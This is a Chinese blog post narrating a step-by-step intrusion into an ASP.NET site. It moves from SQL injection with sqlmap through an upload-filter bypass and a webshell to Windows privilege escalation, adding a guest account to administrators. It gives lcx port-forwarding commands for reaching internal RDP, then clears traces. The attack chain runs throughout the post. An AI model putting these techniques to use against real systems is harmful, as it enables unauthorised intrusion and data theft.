首页 > 安全资讯 >

提权案例(一)渗透某asp.net网站通过sql server数据库public 提权 思路分享 - 痱子﹑ - 博客园

19-05-26

提权案例(一)渗透某asp net网站通过sql server数据库public 提权 思路分享 先罗列出sql server 角色用户的权限 按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述:

提权案例(一)渗透某asp.net网站通过sql server数据库public 提权 思路分享

先罗列出sql server 角色用户的权限

按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述:

第一步先找到了网站的新闻页通过aspx 后缀结尾 判断 基本信息 windows系统 ,数据库可能是mssql

尝试 id=1/0 报语法错误 410 /应用程序种的服务器错误.... 显而易见是mssql 数据库 并且存在sql注入

第二步 再去查他的ip以及网站信息 发现只是地方服务器 没有大厂商的云服务器判断不存在云waf (如果有ip被封了可以换代理ip) 可以直接上工具

第三步 直接sqlmap 跑出表和数据 角色权限public自定义的很低 继续信息收集

第四步 发现前台没什么可利用的信息 先写脚本爬虫 得到网站基本目录 和资源存放地址和一些规则 在上御剑扫描没什么有用信息

第五步 还可以利用强大的搜索引擎 利用google hack 语法 搜索试试 site: *.xxx.com 登录 成功搜索到后台地址

第六步 打开页面地址 通过和前台规则比对 确认是后台地址 输入sqlmap 获取用户名信息登录上去

第七步 寻找上传点找到select 选择框的上传功能 但发现只能上传db 文件 其他文件后缀会自动修改 认真整理他的逻辑 在进入上传点前一个一面

有url 请求 type=db 审查元素发现 select选择框 内 option 元素 由此可以确定他的逻辑 通过选择框来选择执行上面逻辑和确认上传格式文件 直接篡改 成asa (aspx被禁止了) 成功上传

第八步 发现上传成功没有回显无法确定路径和文件名 但是选择img type上传后回显 可以确定上传目录 通过图片命名格式 img201509246518.png 可以猜测命名规则 img 是类型 2015.. 是今天日期 后面可能是当前时间戳 我只需要确定后门的时间戳就行了 写个js脚本发送10次上传木马的请求 同时记录请求时间 通过第1次 时间 和第10次 时间 相减 得到 的时间区间 有十个马 通过遍历这个区间 成功得到相应的就是马的地址

第九步 打开大马查看组件 发现 cmd 和net 组件都被删了 探测后台进程有服务端的安全狗 通过大马上传net,cmd 组件到有执行权限的目录 比如当前的回收站 执行systeminfo 得到打的补丁数 只有4个 上传免杀pr 利用内存溢出直接提权 把来宾用户设置密码加入管理员组

第十步 输入 netatst -ano 发现80端口并不是原地址 有监听地址 通过查询发现他是个内网地址 可以确认通过外网把内网的80端口做了映射 上传lcx 做端口转发 本机执行 lcx -listen3000 3388 监听 3000映射到3388端口 webshell 机子上执行 -slave 我的ip 3000 192.xxx (内网ip) 3389 转发到我的3000端口 本机打开远程连接 输入 127.0.0.1:3388 输入刚刚修改密码的来宾用户 连接webshell 的机子 完美控制 。

第十一步 清理痕迹退出 把漏洞提交到漏洞平台。

对此站渗透的思考

1.可以直接利用扫描工具 wvs appscan webinspect jsky 极光等

2. 对结果就行定向渗透测试

3.shell 方法 上传,包含,命令执行,备份。

4.提权先看打了什么补丁 在看安装的第三方应用 通过ms漏洞提权 和应用提权

5.在拥有webshell 情况下 利用lcx 端口转发突破内网限制

6.信息收集很重要

相关文章
最新文章
热点推荐